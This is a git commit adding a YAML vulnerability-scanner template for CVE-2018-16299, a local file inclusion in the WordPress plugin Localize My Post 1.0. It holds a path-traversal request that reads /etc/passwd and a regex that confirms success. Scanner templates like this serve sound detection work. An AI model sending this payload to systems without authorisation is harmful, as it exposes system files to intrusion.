Create CVE-2018-16299.yaml

patch-1
Roberto Nunes 2021-06-25 07:46:32 +09:00 committed by GitHub
parent 426abedcfa
commit 9cb25ef2f4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

24
CVE-2018-16299.yaml Normal file
View File

@ -0,0 +1,24 @@
id: cve-2018-16299
info:
name: WordPress Plugin Localize My Post 1.0 - LFI
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/45439
tags: wordpress,cve2018,cves,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200